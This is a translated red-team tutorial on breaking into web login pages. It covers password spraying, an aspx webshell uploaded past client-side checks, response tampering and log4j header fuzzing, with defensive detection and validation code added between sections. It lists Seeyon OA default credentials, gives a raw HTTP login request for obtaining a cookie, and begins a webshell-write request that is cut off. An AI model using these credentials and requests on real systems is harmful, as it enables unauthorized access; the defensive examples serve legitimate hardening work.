Title: Share practical cases of Red Team's overseas network management

Breaking in through the most basic component: the login box

The login box is the component encountered most often during HW (attack-defense drill) engagements, and it is also where vulnerabilities are easiest to find. Below are some commonly used test methods.

Login brute-forcing tips

For a system like this there are two ways to brute-force the login:

1. Analyze the front-end encryption algorithm and write a script that encrypts each password in the dictionary before sending it.
2. Fix the password to a common value such as 123456 or 000000 and use a list of common usernames as the dictionary.

Each method has its advantages and disadvantages. I prefer the second, which is more efficient in a competition; analyzing the encryption algorithm is better suited to red team assessment projects.
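The fixed-password, rotating-username approach above is what defenders call password spraying, and per-account lockout never triggers on it. As an added example that is not part of the original post, this detection runs over constructed log lines and flags sources whose failures span many distinct accounts inside one window:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth log (not from the original post): 203.0.113.5 tries
# one password against many accounts; 198.51.100.9 is a real user mistyping.
SAMPLE_LOG = """\
2023-11-30T17:16:01Z login FAIL user=admin src=203.0.113.5
2023-11-30T17:16:02Z login FAIL user=test src=203.0.113.5
2023-11-30T17:16:02Z login FAIL user=zhangsan src=203.0.113.5
2023-11-30T17:16:03Z login FAIL user=lisi src=203.0.113.5
2023-11-30T17:16:03Z login FAIL user=wangwu src=203.0.113.5
2023-11-30T17:16:04Z login FAIL user=guest src=203.0.113.5
2023-11-30T17:16:05Z login OK user=audit src=203.0.113.5
2023-11-30T17:16:10Z login FAIL user=alice src=198.51.100.9
2023-11-30T17:17:01Z login OK user=alice src=198.51.100.9
"""
LINE_RE = re.compile(r"^(\S+) login (OK|FAIL) user=(\S+) src=(\S+)$")

def parse(log_text):
    """Yield (timestamp, result, user, src) for every well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield (ts,) + m.groups()[1:]

def detect_spray(log_text, window=timedelta(minutes=5), min_users=5):
    """Sources whose failures hit >= min_users distinct accounts inside one
    sliding window. Per-account lockout never fires on this pattern (one try
    per account), so the counter must be keyed by source, not by user."""
    fails = defaultdict(list)                       # src -> [(ts, user)]
    for ts, result, user, src in parse(log_text):
        if result == "FAIL":
            fails[src].append((ts, user))
    alerts = {}
    for src, events in fails.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break
    return alerts

def hits_after_spray(log_text, alerts):
    """Accounts that logged in OK from a flagged source: triage these first,
    since the spray most likely guessed their password."""
    return sorted({u for _, r, u, src in parse(log_text)
                   if r == "OK" and src in alerts})
```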

Use the brute-forced credentials to log in to the back end, then keep looking for an upload point there.

Here the upload is restricted to image file formats.

Add the aspx file type directly.

Shell obtained successfully.
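The upload bypass above works because the allowed-type list is enforced only in the browser. As an added example, not the vulnerable application's code, this is a server-side validator that decides on the normalized extension, an allowlist and the file's leading bytes, and rejects shell.aspx together with the usual shell.aspx;.jpg and shell.aspx.jpg variants:

```python
import os
import re

# Added example, not the vulnerable application from the original post.
# Allowed extensions mapped to the magic bytes a genuine file must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def validate_upload(filename, content):
    """Return (ok, reason). Only server-side facts decide: the normalized
    extension checked against an allowlist, and the file's leading bytes.
    The browser's accepted-types list and the client-sent Content-Type are
    never consulted, because the uploader controls both."""
    base = os.path.basename(filename.replace("\\", "/"))
    # Old IIS/parser tricks: "shell.aspx;.jpg", "shell.aspx\x00.jpg", "a.jpg."
    if any(c in base for c in ";\x00") or base.endswith(".") or base.startswith("."):
        return False, "suspicious filename"
    stem, dot, ext = base.rpartition(".")
    if not dot:
        return False, "no extension"
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    # Double extensions (shell.aspx.jpg) fail here: the stem must be plain.
    if not SAFE_STEM.match(stem):
        return False, "stem contains disallowed characters"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    return True, "ok"

def stored_name(filename, content, random_token):
    """Name the file on disk ourselves: a server-generated token plus the
    validated extension, so the client-chosen name never reaches the
    filesystem. Serve the directory with script execution disabled."""
    ok, reason = validate_upload(filename, content)
    if not ok:
        raise ValueError(reason)
    return f"{random_token}.{filename.rpartition('.')[2].lower()}"
```

Magic-byte checks do not stop polyglot images, so re-encode accepted images and keep the upload directory non-executable regardless.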

Modify the response parameters to get into the back end

Sometimes a website's login state is judged on the front end, in which case we can bypass it by directly modifying the response packet.

The front-end login logic is decided by the ret value in the response: when ret is 1, the login is treated as successful.

Successfully entered the back end
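The ret=1 trick only works when the front end alone decides the login state. As an added example (not the original application's code; the secret and the test account are constructed), here a back end signs its own session token and re-checks it on every privileged request, so flipping ret in the response unlocks the UI but nothing behind it:

```python
import hashlib
import hmac
import json
import secrets
import time

# Added example, not code from the original application. The secret and the
# test account are constructed for the demonstration.
SERVER_SECRET = secrets.token_bytes(32)
USERS = {"admin": "correct horse battery staple"}

def issue_token(username, ttl=3600):
    """Server-signed session: user|expiry|HMAC. Only the server can mint one."""
    payload = f"{username}|{int(time.time()) + ttl}"
    sig = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{sig}"

def current_user(token):
    """Verify the token on EVERY privileged request; return username or None."""
    try:
        username, expiry, sig = token.split("|")
        expiry = int(expiry)
    except (AttributeError, ValueError):
        return None
    expected = hmac.new(SERVER_SECRET, f"{username}|{expiry}".encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected) or expiry <= time.time():
        return None
    return username

def login(username, password):
    """The JSON the front end receives. 'ret' is informational only;
    authority lives in the signed token, which a failed login never gets."""
    if USERS.get(username) != password:
        return {"ret": 0, "msg": "bad credentials"}
    return {"ret": 1, "token": issue_token(username)}

def admin_page(token):
    """Protected back-end endpoint: the server, not the UI, decides."""
    user = current_user(token)
    return (401, "login required") if user is None else (200, f"welcome {user}")

def simulate_front_end_bypass():
    """The post's trick: flip ret 0 -> 1 in the intercepted response. A front
    end that branches on ret alone shows the admin UI, but every back-end
    call still carries no valid token and is refused."""
    resp = login("admin", "wrong")
    tampered = json.loads(json.dumps(resp).replace('"ret": 0', '"ret": 1'))
    status, _ = admin_page(tampered.get("token"))
    return tampered["ret"] == 1, status
```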

Plugins for detecting common SQL injection and log4j vulnerabilities

Recommended SQL injection plugin: https://github.com/smxiazi/xia_sql

Its basic principle is to send several variants of each request and judge from the length of the returned data whether injection is present.

In addition to passive scanning, we can also manually add single and double quotes and inspect the response; if the response contains a database error, there may be SQL injection.

Then run it through SQLmap.

Recommended log4j plugin: https://github.com/TheKingOfDuck/burpFakeIP

Fuzz the request headers with the Burp plugin.

The log4j vulnerability was detected successfully in the login box.

Note, however, that many dnslog platforms have been blacklisted by firewalls, so it is recommended to use ceye or to build your own dnslog platform.
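On the detection side of the header fuzzing described above, as an added example that is not part of the original post: a normalizer that folds the lower/upper/default-value lookups used to disguise the JNDI keyword and then checks request headers. The sample headers are constructed and use .invalid domains.

```python
import re

# Constructed sample headers (not captured traffic): three probes using the
# nesting tricks seen in the wild, one benign browser header.
SAMPLE_REQUESTS = [
    {"User-Agent": "${jndi:ldap://probe.example.invalid/a}"},
    {"X-Forwarded-For": "${${lower:j}${upper:n}di:${::-l}dap://probe.example.invalid/a}"},
    {"X-Api-Version": "${${env:NaN:-j}ndi:rmi://probe.example.invalid/b}"},
    {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"},
]

# An innermost lookup: ${...} whose body contains no further ${ or }.
INNER = re.compile(r"\$\{([^${}]*)\}")

def resolve_inner(expr):
    """Fold one lookup the way Log4j 2 would evaluate it, for the forms
    probes use to hide the keyword: case lookups and ':-default' fallbacks.
    A jndi lookup itself is kept verbatim so the caller can see it."""
    if expr.lower().startswith("jndi:"):
        return "${" + expr + "}"
    if expr.lower().startswith("lower:"):
        return expr[6:].lower()
    if expr.lower().startswith("upper:"):
        return expr[6:].upper()
    if ":-" in expr:                         # ${env:X:-j}, ${::-j}, ${date:X:-j}
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"                 # unknown lookup: leave in place

def normalize(value, max_rounds=20):
    """Fold innermost lookups repeatedly until nothing changes (bounded)."""
    for _ in range(max_rounds):
        folded = INNER.sub(lambda m: resolve_inner(m.group(1)), value)
        if folded == value:
            break
        value = folded
    return value

def is_jndi_probe(value):
    return "${jndi:" in normalize(value).lower()

def scan_headers(headers):
    """Names of the headers whose value normalizes to a JNDI lookup."""
    return [name for name, val in headers.items() if is_jndi_probe(val)]
```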

System default password + back-end 1day exploitation

As attack-defense drills become more and more frequent, fewer and fewer front-end vulnerabilities remain directly exploitable on the public internet; most have been fixed after mass scanning. We can, however, use the system's default password and combine it with a 1day for exploitation.

If the default password is still in place (admin/admin123):

Once in the back end, commands can be executed via scheduled tasks or deserialization.

Often when we encounter an OA system we scan it with OA vulnerability detection tools, find nothing, and give up. In fact, this kind of OA system may well have a default-password problem.

Default passwords

System administrator: system/system
Group administrator (A8-V5 Group Edition): group-admin/123456
Unit administrator (A8-V5 Enterprise Edition): admin1/admin123456
Audit administrator (all versions): audit-admin/seeyon123456

Sometimes the account and password cannot be used to log in at the front end. In that case, send the following request to obtain a cookie.

POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

UserAgentFrom=xx&login_username=audit-admin&login_password=seeyon123456

After obtaining the cookie, a back-end vulnerability whose patch is relatively recent can be used for deeper exploitation; this time the copyfile back-end vulnerability is used.

However, in actual engagements I found that this vulnerability has some pitfalls: an error was reported when writing the webshell.

POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=111 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 70
Host: 192.168.91.17
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Accept-Encoding: gzip,deflate

arguments=%5B%22
